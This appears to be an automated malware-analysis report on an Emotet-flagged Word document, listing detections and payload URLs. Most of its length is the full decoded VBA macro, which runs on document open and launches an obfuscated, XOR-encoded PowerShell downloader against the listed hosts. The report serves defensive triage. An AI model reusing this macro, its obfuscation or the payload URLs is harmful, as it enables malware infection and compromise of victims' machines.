MALICIOUS
232
Risk Score
Heuristics 8
-
ClamAV: Doc.Downloader.Emotet-6877417-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6877417-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
CTcuww = Sqr(75042) fzWAb = hCHkkPHlU + VBA.Shell(TjBqakLFsB + Chr(JwjUOhaSYO + vbKeyP + rawTkVihJ) + "owers" + jHDEhW + sSRbaB + FCvjPdP + kFCAo + CbmiaOwvIQu, 61718 - 61718) oRiwYm = MhstzA - BbzSO / 33081 / UuIWfk - 223327908 + Hex(CzRwj) * wSLMBP - Round(77589) -
Payload URL decoded from an encoded PowerShell loader (5 URLs) high OLE_VBA_ENCODED_PS_DROPPER_URLA VBA macro assembles (from literals scattered across helper functions) a WScript.Shell command that runs a PowerShell stage-2 loader whose download URL is hidden in a numeric char-code array — decoded at runtime by [char]($_ -bxor k) (or +k / -k) after splitting on obfuscated delimiters. The decoded hosts (often an @-separated fallback list dropped to %TEMP% and executed) are the next-stage payload URLs, never contiguous on disk; surfaced as IOCs. Self-validating: only a transform yielding a valid host URL is reported.
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
End Function Private Sub Document_open() On Error Resume Next -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://innerlinkdesign.com/pqHFlQ/ Referenced by macro
- http://dgnet.com.br/iWuVO/Referenced by macro
- http://lemat.sk/LI5995/Referenced by macro
- http://k8ir.com/VZo3/Referenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
- http://www.light-31f.myjino.ru/2LqTFVD/Referenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15322 bytes |
SHA-256: 1c67c395c6b927153c0f02aa898ff4e7c1260d7f5ae3796f68a37f4ef70a52c0 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
248 of 397 identifiers look randomly generated (e.g. 'XCcVWDsKvFZos') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "KHGMqwXuW"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function fzWAb()
On Error Resume Next
uKVjjM = XrJVi - CqdIj / 19486 / wJLrnB - 223327908 + Hex(iriWKE) * tFqWj - Round(67114)
cNuzwr = 87458 + wqqGp + (28519 * CDbl(FlCijU) - hihaAk / CSng(66292) - mnPLF / Hex(uoEZV) + 54267 - 10026)
VsFXh = cwidq
CziSNX = Sqr(21485)
XamqL = zsdFB - tksNo / 22488 / iZKBZ - 223327908 + Hex(QAYoZq) * DUBSKz - Round(41891)
dlwdv = 60101 + hfJmKi + (86604 * CDbl(lmlCb) - RawlR / CSng(49102) - amYtzp / Hex(HGNbBC) + 84441 - 2070)
jiMGW = AIFJdN
awriq = Sqr(43887)
fNhkU = ATpQmw - zhvNsw / 90155 / FBPSrm - 223327908 + Hex(ZkMZF) * aImPql - Round(76694)
stMZNL = 90139 + aDEPM + (6322 * CDbl(jaCpp) - XEMFY / CSng(89633) - LrGWT / Hex(Laotzn) + 51751 - 74125)
GVzvAl = phiDX
Rtjohj = Sqr(11361)
doYESc = rnilaF - jXwmVc / 79620 / niAau - 223327908 + Hex(wjwTT) * fiQqs - Round(45947)
aMSRc = 5756 + tFDMsw + (43031 * CDbl(JzBMH) - ziaiu / CSng(33663) - oIWou / Hex(AwTzN) + 66365 - 12039)
IXonwU = lbpkL
CTcuww = Sqr(75042)
fzWAb = hCHkkPHlU + VBA.Shell(TjBqakLFsB + Chr(JwjUOhaSYO + vbKeyP + rawTkVihJ) + "owers" + jHDEhW + sSRbaB + FCvjPdP + kFCAo + CbmiaOwvIQu, 61718 - 61718)
oRiwYm = MhstzA - BbzSO / 33081 / UuIWfk - 223327908 + Hex(CzRwj) * wSLMBP - Round(77589)
mdAtD = 85278 + XtEmSH + (86143 * CDbl(wGHuz) - NqHhV / CSng(99604) - XtmkqJ / Hex(ChXnAp) + 82870 - 65523)
bJfzf = GmEwLc
tiYhp = Sqr(77392)
cuoFkK = vFHKNY - DXpna / 95922 / kSYuG - 223327908 + Hex(EUaOM) * DuSsXL - Round(59648)
UWWZt = 3589 + KkavQE + (36769 * CDbl(PlQwcZ) - mMfzw / CSng(44606) - WCWMhd / Hex(pnINJA) + 39784 - 63025)
FHvrh = rCaPbX
bdVIm = Sqr(79208)
End Function
Private Sub Document_open()
On Error Resume Next
uPLhYj = IMjwz - IcuBGt / 28770 / KwFpM - 223327908 + Hex(nvmhA) * DSlfun - Round(3497)
sbQLdw = 80079 + iszjVi + (72130 * CDbl(SbvEwc) - inzkj / CSng(28123) - uAqMBq / Hex(LhjDld) + 20266 - 85870)
MICqGI = XFfUMr
mwlbNt = Sqr(32797)
SoHFfz = MzioG - MbvjU / 15887 / oEqLE - 223327908 + Hex(mNdNi) * qbulub - Round(74135)
ljQFr = 21835 + aNZCz + (27088 * CDbl(qqOHSs) - GmEtuc / CSng(63276) - DNaBh / Hex(iUaCc) + 63214 - 83965)
uYtMv = iTrZHz
zrPhwn = Sqr(55476)
fzWAb
uwHtN = BdjFL - YXEjj / 92096 / DDiBwC - 223327908 + Hex(cIUzMi) * sRDGq - Round(48932)
GoOwwA = 12835 + wikEu + (30854 * CDbl(RqBFhX) - awwSU / CSng(2772) - zKMAOk / Hex(jmzbfZ) + 19599 - 60374)
INFtsk = mPTAd
owUoV = Sqr(48481)
rwWPCi = TZwiIV - VYmaB / 8248 / dqPraZ - 223327908 + Hex(sBOMl) * LLwfAz - Round(36777)
kVOQuJ = 82646 + mtJjs + (62603 * CDbl(fFAapW) - Sjjbj / CSng(88531) - iYCKUu / Hex(dAJzz) + 13828 - 56764)
lTvaO = HwkRo
KOihfb = Sqr(86695)
End Sub
Attribute VB_Name = "XCcVWDsKvFZos"
Function jHDEhW()
On Error Resume Next
ljTIm = nJcBTE
qowAOw = Sqr(60585)
ozKROW = 87561 + wqiMl + (63483 * CDbl(dQTHka) - UYQcl / CSng(24951) - iLzfC / Hex(hIbWQ) + 3693 - 14402)
iLTPU = lBmkjE - ifhjJ / 14348 / owriT - 223327908 + Hex(ikTbWO) * SdnLm - Round(5865)
zLEwdnnPQ = "HeLL" + " .( $VeRB" + "OsePrE" + "FEr" + "ENCE.tO"
XakfV = ULJOR
VsZRD = Sqr(37830)
rKXlT = 70650 + oBBhKO + (35158 * CDbl(ABrVwG) - zNMMN / CSng(32080) - TaEKR / Hex(LvsUb) + 81937 - 27925)
KStUz = MJZHXf - iacAzv / 45129 / JXuGr - 223327908 + Hex(bUmuK) * rIILpR - Round(71876)
kvFPlfXap = "St" + "rIn" + "G()[1,3]+'x" + "'-" + "joIn'') " + "( -jOIn ([ch" + "AR[]]" + "(2, 104 ,126, "
lSMDLl = vQYUH
zqcztc = Sqr(98339)
PAvzOH = 63198 + omMNil + (48307 * CDbl(RKfJY) - qKqvG / CSng(73389) - ENaCAb / Hex(NMbJE) + 26355 - 92923)
ozXvK = ITBuEk - lKhKQ / 9985 / jVFLX - 223327908 + Hex(KzSGs) * FzlEd - Round(61846)
FLWMoOwpsi = "81" + " , 96 , 81,6" + "8 , 6, 27 ,6" + " ,72 , " + "67, 81 ,11 ," + " 73 , " + "68 , " + "76, " + "67,69, 82, " + "6 , 84,71 ,"
cDIIJJ = INjup
NHJhj = Sqr(26569)
XuiTsM = 46193 + ZIAvC + (44 * CDbl(YAGEiS) - BbNvBL / CSng(2463) - TXRPjL / Hex(SLRIz) + 5150 - 89254)
qLJusD = zKMzd - ddmTTD / 63952 / nVVZHT - 223327908 + Hex(nrdRj) * jFGlTR - Round(25666)
hJilzwRuBW = " 72, 66" + " ,73, 75 ,29 ," + " 2" + " ,75 " + ", 85 ,105,73 "
GvzZF = jVqOjj
PfJhL = Sqr(80513)
DpnUlj = 9481 + Siiuv + (93027 * CDbl(fhAlT) - jaYACp / CSng(33635) - BPkCN / Hex(QSQhiI) + 10463 - 76450)
OvMAW = PUitn - QSzriS / 14503 / QSDLa - 223327908 + Hex(NIUsIG) * tBppNG - Round(2984)
kcntvBf = ", 105, 6 , 2" + "7," + "6 , 72, 67 ," + "81 , 11 ,73,6" + "8,76, 67,69 ,82"
jHDEhW = zLEwdnnPQ + kvFPlfXap + FLWMoOwpsi + hJilzwRuBW + kcntvBf
End Function
Function sSRbaB()
On Error Resume Next
wwoUO = uSobO
vwICo = Sqr(98759)
crvrB = 50760 + BHzqlj + (28670 * CDbl(RHBVM) - KUTPq / CSng(22636) - TqjRt / Hex(zCFzo) + 74615 - 54806)
cKmFCz = WccKO - iQTYr / 57612 / VLJNi - 223327908 + Hex(FOYKMC) * WqjuL - Round(83400)
iJdEV = " ,6 ," + " 117 ,95,85, 8" + "2 ,67," + " 75 , 8,104 , " + "67,82," + " 8 ,113" + " , 67"
hfdVi = URfdk
OdhLF = Sqr(42077)
KkiRA = 48553 + SrDzS + (31480 * CDbl(ClrkY) - AYhph / CSng(77977) - KPojvZ / Hex(scsYf) + 40537 - 77264)
iauEY = lCojL - NCDUCs / 29532 / ZtSED - 223327908 + Hex(bKDIW) * NojNor - Round(1749)
zPvEoONWiT = " , 68 , " + "101 ,74, 79" + " , " + "67, 72 , 82 , " + "29 , 2 ,64 ,82" + ",11" + "7 , 74,1" + "09 , 6," + "27 , 6, 1," + "78, 82,8"
GZDpUi = WKJfSp
bXcrBA = Sqr(8)
wpHqA = 1437 + bwjNcd + (49279 * CDbl(pjLrZ) - ApdkY / CSng(95181) - zucDt / Hex(srGzr) + 319 - 13473)
dUbQz = zdFbDi - EDJiWh / 59282 / iTrSdY - 223327908 + Hex(BsXwF) * RIcdJw - Round(84548)
LQYorNJWuh = "2, 86 , 2" + "8, 9 ," + " 9, 79 ," + "72"
sPwcEX = SJfTV
HkYlE = Sqr(37684)
vAkwUX = 62434 + NEGYwm + (89737 * CDbl(FMlmFp) - upZBz / CSng(66767) - rdksVI / Hex(ipYLAi) + 22288 - 81384)
ijFwpJ = WhtiNd - ERloaW / 24674 / FLsElR - 223327908 + Hex(aziXv) * MQMCV - Round(89773)
ZpofHuE = ",72 ,67," + " 84,74,7" + "9 ,72,77 ,66, " + "67 , 85,79, 65," + " 72 ," + "8 , 69 "
iHAwN = DTmwd
JfcLS = Sqr(25701)
UGbuDl = 46999 + FGwzph + (75108 * CDbl(BZmFbK) - wLtrVN / CSng(95344) - ABaaul / Hex(IRwRz) + 46367 - 20694)
YVKKc = JuCPHS - wOGsGi / 32017 / IKNYn - 223327908 + Hex(kLtCf) * qdFQkI - Round(75331)
RndCNEX = ",73, 75 ,9,86" + ",87, " + "110 ,96, 74 ,11" + "9 , 9 ,102 , 78"
WuBpFO = uYjEn
koMNIi = Sqr(70752)
pPKzlp = 48037 + iJMcs + (11456 * CDbl(JqHwr) - wOJYT / CSng(47238) - qmJws / Hex(ANvSzS) + 27300 - 50367)
cFvfqA = ZSRRi - zOkOFH / 27068 / IjdrK - 223327908 + Hex(ULFPZF) * hswwJ - Round(25290)
PWtFPdffVE = " ,82, 82, 8" + "6 , 28,9,9 ,66" + ",65 ," + " 72,67,82 ," + " 8,6" + "9,73 , "
thBwsr = ZczDbW
DPASD = Sqr(79325)
UZSnj = 43700 + OMBscq + (35600 * CDbl(nPvtT) - afhzSs / CSng(90602) - GMzjvM / Hex(iKdqO) + 60490 - 40362)
IhDitt = oNdkfF - usvFCI / 9360 / DFzFf - 223327908 + Hex(jSartX) * QjQTZ - Round(88134)
UpYiwMHujJA = "75 ,8 , 68,84," + "9 ," + " 79, 11" + "3 ," + " 83 , 112,10" + "5,9 , 102" + " ,78,82, 8" + "2,86 ,28, 9 ,"
QMdAP = IXFNB
IjNhZ = Sqr(58580)
irdzfn = 28618 + EuDtm + (65679 * CDbl(iMilcO) - ArbzqU / CSng(40823) - MNpMs / Hex(nikjK) + 74501 - 33729)
abZRw = mWjwul - iqEZpZ / 82439 / tFRcQi - 223327908 + Hex(rlJvqC) * lQvwVA - Round(23392)
LwSWQv = " 9, 74,6" + "7, 75,71,82 " + ",8 , 85, " + "77 , 9,106,11"
sSRbaB = iJdEV + zPvEoONWiT + LQYorNJWuh + ZpofHuE + RndCNEX + PWtFPdffVE + UpYiwMHujJA + LwSWQv
End Function
Function FCvjPdP()
On Error Resume Next
jQAYn = foszn
FiqMs = Sqr(20488)
hVIpfM = 8150 + vnzvqw + (9356 * CDbl(dsDqSp) - AbrrQ / CSng(22645) - RvDWEQ / Hex(FRJwh) + 17405 - 91430)
wzNrwH = nUnSw - ErUro / 60969 / autkj - 223327908 + Hex(kVJADT) * RzFINR - Round(1931)
pvJNpVZER = "1 ,19" + ", 31, " + "31 ,19 , " + "9 , 102 " + ", 78, " + "82 , 82 ,86 , 2" + "8 , 9 ,9, 81," + "81 ,81,"
ioIPKY = NOwYM
PzTHb = Sqr(5584)
ZCDdLX = 44248 + iUkzMF + (10053 * CDbl(LiWijw) - lVWCX / CSng(14775) - BiHzsw / Hex(fCudz) + 231 - 39232)
ChGcw = HpVzk - SFrNNI / 68280 / ccAjwk - 223327908 + Hex(FYiQf) * hcZtPA - Round(70174)
swPPUj = " 8, 74," + " 79 ,65 ,78,82" + " ," + " 1" + "1 , 21 ," + " 23 ," + " 64 ,8 , 75" + ",95" + ", 76," + "79"
NYiOQ = TYkGz
vJZQqF = Sqr(31483)
WrahZj = 22546 + CQnjE + (83069 * CDbl(cSUwIz) - PDWSf / CSng(67679) - hnbRnV / Hex(CsTiof) + 42294 - 92852)
qtPbW = GBcMU - LSRWua / 49624 / PTTlT - 223327908 + Hex(bIFSC) * XTauFP - Round(60090)
jYOmczi = " , 72 ,73 ,8 " + ",84,83,9 ,20," + "106,8" + "7 , "
MhLSBT = csDWQ
JINhk = Sqr(40322)
QsXZdI = 8500 + zvKJtF + (84687 * CDbl(XQfvsn) - HBkAsw / CSng(32529) - vmvHa / Hex(UcGaz) + 28893 - 71734)
rUncJP = sHLlj - OXzwRp / 4214 / YUuYzF - 223327908 + Hex(cmLNvO) * RHiRn - Round(93584)
BLTQFFw = "114,96 , " + "112 , 9" + "8, 9 , 102, 78 " + ",82 ,82" + ",86,2" + "8 , 9, 9,77,30," + "79, 84 , 8,69," + "73,"
wPMirn = KPQvSz
dOozM = Sqr(55117)
AtEMJ = 61954 + VAXli + (19895 * CDbl(qTzCF) - ZFhqF / CSng(36522) - RWuSd / Hex(lRNaE) + 56378 - 31636)
UwQsNw = uMNGqZ - zFFHQY / 77135 / svZpjw - 223327908 + Hex(sttqaz) * iZPSr - Round(44172)
MiXZpDkANvo = "75 ,9, 11" + "2, 124 , " + "73 ,21 ,9 , 1" + ", 8, 117 , 86 ,"
NwmqV = JjpwDr
mrVDhE = Sqr(94767)
EVTYNz = 8010 + UNAzA + (49722 * CDbl(frzhRb) - zmwNSh / CSng(17475) - wmiGV / Hex(GrEuS) + 64888 - 85864)
WaQZYj = AiWKQ - NQtES / 47375 / tmwtm - 223327908 + Hex(AGrOz) * GwQIq - Round(92752)
JWuaNWr = "74" + ",79 ,82,14 " + ",1,102 ," + " 1 ," + "15 ,29, 2," + "108,10" + "0 ,98,71, 79," + "110, 6, 27, "
ZREPvX = TYbbzP
RSAaT = Sqr(46037)
zFjcWm = 22564 + TIQXFJ + (36249 * CDbl(HDIiwi) - XCWKsb / CSng(60126) - PkYJs / Hex(jTJYtw) + 92650 - 98501)
hjOQMZ = cSEnr - nhzZR / 53135 / wJFjsX - 223327908 + Hex(ErrBLs) * CrucT - Round(12196)
dBZhJKVd = "6, 2 ,104 , 126" + ",81, 96, 81 ,68" + " , " + "8,72 ,6" + "7 ,94, 82 ," + "14 ,23 ,1"
FCvjPdP = pvJNpVZER + swPPUj + jYOmczi + BLTQFFw + MiXZpDkANvo + JWuaNWr + dBZhJKVd
End Function
Function kFCAo()
On Error Resume Next
hFoLE = lkTaJs
iEVAuO = Sqr(56539)
sYbfXo = 91898 + kaDczc + (70027 * CDbl(EzzVPQ) - RYoZs / CSng(39930) - RrTEf / Hex(QPEiKY) + 94379 - 59598)
WYbUJ = jPCaM - LIvwF / 47005 / sTKqTY - 223327908 + Hex(pjEsZJ) * jwfEJH - Round(16043)
UwhXvCHiK = "0 , 6,21, 30," + " 18, 17," + "30, 22, 1" + "5, 29 ,2" + " , 82, 83,97 ," + "87, 81 ,6, 2" + "7,6 , 2, 6"
PHwkV = aJYvW
Ezwhz = Sqr(88668)
ksMhI = 93509 + RzKKAD + (42565 * CDbl(MPsvRj) - DDsjD / CSng(13431) - afzDk / Hex(okzwN) + 57535 - 82153)
tjzFs = oJpYt - CYfNz / 36142 / rbSwi - 223327908 + Hex(qAwFtB) * MBhwz - Round(96238)
FqFzwniD = "7 " + ",72,80 , 28 " + ",82" + " ,67, 75 " + ",86 ,6,13, 6 , " + "1 , 122, 1 ," + "6 , 13 ,6 , 2,"
ozbIXT = owZjB
IYMAiw = Sqr(76776)
fCmak = 33063 + CNqDv + (44324 * CDbl(JAqhPz) - iszKZO / CSng(60981) - BZWsn / Hex(JPHOj) + 61697 - 80764)
rTCnB = mQLCm - LRjCj / 33020 / ljTjSk - 223327908 + Hex(jbzYk) * NuhCqz - Round(44165)
LXiLHVGd = "108 ,100" + " , 98," + "71,79, " + "110 ,6,13" + " , 6" + ", 1,8 ,6" + "7, 9" + "4 " + ", 67 , 1, 2"
cqCdtp = rsJQN
pCzIO = Sqr(94755)
CYYkjD = 96048 + LTmSEm + (34262 * CDbl(dMkuAJ) - QFZvor / CSng(67779) - IWiLVI / Hex(HwZXR) + 44751 - 32192)
SwtfIi = HJjci - vVbwaL / 8676 / VdsVzu - 223327908 + Hex(sqjVqc) * kSqAn - Round(95775)
AcsGFW = "9," + "64, 73 " + ", 84 ,67," + " 71,69 ,78 , 14" + " , 2 ,10" + "3 ,69" + " ,74,101 ," + "127 , " + "6 ,79 , 72"
PnosmP = bBhCs
niElYi = Sqr(36204)
zUBJJk = 49706 + SAGnB + (83712 * CDbl(IGaYGw) - pDdMi / CSng(32141) - pCSwj / Hex(QRjqC) + 46076 - 47977)
Hdmurf = jwFJzc - npSlUr / 48960 / ViZJCV - 223327908 + Hex(aGizu) * pMpOkT - Round(655)
wkjiO = " , 6,2 ,64," + "82, 117 , 7" + "4, 1" + "09, 15 ," + " 93,82 , 8" + "4," + " 95, 93, 2"
wOZTpu = TmNbV
Xlmvlp = Sqr(30656)
HDUic = 55378 + VzaBi + (5611 * CDbl(ddWjYZ) - ZTApMb / CSng(19471) - TUWZX / Hex(IVfIqs) + 46021 - 94893)
CwiijT = PBzOfG - JfQUIr / 53353 / jRbfcE - 223327908 + Hex(fZSDrT) * pzZBms - Round(78217)
JuLqRXWzQr = " ,7" + "5 ,85 " + ", 105, 73, 105," + "8, 98 , 73, 81 " + ", 72 ," + " 74,73,71 ," + "66 ,96 , 7" + "9,74 ,67 " + ",14 , 2 , 103 ," + " 69, "
JRhscG = QhYBUQ
pTjwQ = Sqr(24364)
GDrop = 42907 + wbOLj + (81797 * CDbl(vGEjt) - HKzkbT / CSng(1772) - kfpzM / Hex(sVKzC) + 35317 - 45212)
bUSbf = wFGNW - PLwZL / 38681 / ZZwGj - 223327908 + Hex(MtUiDf) * onJKW - Round(47238)
tESwp = "74,101,127 " + ", 8, 114," + "73 ,117,8" + "2,84"
PvQDkj = ICstVb
NPjzG = Sqr(82937)
nviNlz = 36600 + caDhT + (63735 * CDbl(CmCnnC) - JtVAiE / CSng(84234) - liDEBs / Hex(zlYNAT) + 80322 - 99806)
ovJmkr = VOXApU - OjiYoR / 28207 / CJTtSm - 223327908 + Hex(YsUuA) * IrGtF - Round(99590)
hHdQDabrAw = ", 79" + ", 72,6" + "5,14,15, 10," + "6, 2 ,82, 83" + ",97 ,87 ," + "81" + ",15 , 2"
zdTAf = wjzaR
wnEKL = Sqr(87305)
TNtAS = 82937 + wHpif + (91217 * CDbl(NFoci) - RLbZqT / CSng(28161) - niaRCU / Hex(BPrnCj) + 2038 - 90465)
VwiIHm = KzcjK - PMcbmM / 81247 / obDQQR - 223327908 + Hex(CODhuj) * VULaP - Round(89868)
UuwTjE = "9,117 , 82,7" + "1, " + "84, 82, 11 , " + "118" + ", 84,73,69 ,"
naAqRu = LdXzDz
YktCO = Sqr(22164)
VfsqUt = 14875 + YzQtJr + (16135 * CDbl(MwvQB) - CazXp / CSng(83188) - fhrmZz / Hex(TkvAZB) + 3244 - 1671)
HhiTc = rwEQB - RZHkrT / 92070 / BuqzzC - 223327908 + Hex(anvoW) * ijEuj - Round(23698)
fZNvEfOiYU = "67 , 85 , 85, 6" + " , 2," + "82 " + ",83 , 97 , " + "87" + " ,81,29,68,"
kFCAo = UwhXvCHiK + FqFzwniD + LXiLHVGd + AcsGFW + wkjiO + JuLqRXWzQr + tESwp + hHdQDabrAw + UuwTjE + fZNvEfOiYU
End Function
Function CbmiaOwvIQu()
On Error Resume Next
swwIA = jAQzB
hWkvKN = Sqr(16282)
SjBMqf = 39024 + RQIJbi + (46756 * CDbl(pCqLHu) - DwhwqS / CSng(95) - otFEl / Hex(WOOLlk) + 54684 - 80538)
bYzwOI = dHRGUP - anKSo / 54064 / VJHNLA - 223327908 + Hex(FXpwjD) * jliIFi - Round(65640)
KVcGXijs = "84 , 6" + "7,71, 77, 29, " + "91" + ", 6" + "9, 71" + " ,8" + "2 , 69" + " ,78 ," + " 93 , 81 ,84," + " 79 ,82 ,67 , 1"
TWVXKv = lsZjqG
RCwGh = Sqr(82972)
slCHD = 45804 + cJoMst + (2750 * CDbl(KitRrq) - ropjIl / CSng(94133) - zNWRt / Hex(FwiKtr) + 23515 - 64945)
YPYHtN = XPzfn - wVcImE / 69643 / HzwYJ - 223327908 + Hex(YiMfPf) * oHslz - Round(85182)
HVvcR = "1," + "78 ," + " 73 , 85,8" + "2 " + ", 6,2 , 121," + " 8, 99," + " 94 ,69 "
HuuMZt = vZnTd
OrbwRS = Sqr(3022)
WRSZi = 69622 + tsDTPH + (51731 * CDbl(OjWmM) - IMCmz / CSng(30989) - cEYLl / Hex(qXoTC) + 29627 - 16135)
qRhRDO = PnjUS - nfIii / 69776 / ZQUXDR - 223327908 + Hex(VbqhzQ) * OHiUVc - Round(36200)
LsIOsVI = ",67, 8" + "6, 82,7" + "9, 73, 72 ," + "8 ," + " 1" + "07 ,6" + "7, 85 ,"
jTvqU = MSSiiO
RYowCo = Sqr(77980)
awKNl = 40558 + owBWBW + (47813 * CDbl(iJMIU) - kAbNw / CSng(34119) - IYwPB / Hex(oKTHkH) + 68295 - 70012)
WauHp = izpDaf - CHAjk / 26839 / BcAkQ - 223327908 + Hex(iDYwP) * UPcoH - Round(61775)
kjTFfVsF = "85,71" + ", 65" + " , 67, 29 ,91" + ",91) |FORe" + "ACh-ObJECt{ " + "[chAR]" + "($_ -bXO"
NlHuDJ = MPRoO
EPEsEp = Sqr(97748)
aiGtZ = 18692 + pNfaqo + (9761 * CDbl(HZSsD) - zYuhzb / CSng(22642) - Tlkjwv / Hex(IjPzpI) + 1248 - 12147)
KjaFML = iiButq - rKVwp / 5371 / OdzSOd - 223327908 + Hex(XTkdmp) * QUkwY - Round(76295)
TjJfYHa = "R '0x" + "26' )" + "}) )"
CbmiaOwvIQu = KVcGXijs + HVvcR + LsIOsVI + kjTFfVsF + TjJfYHa
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.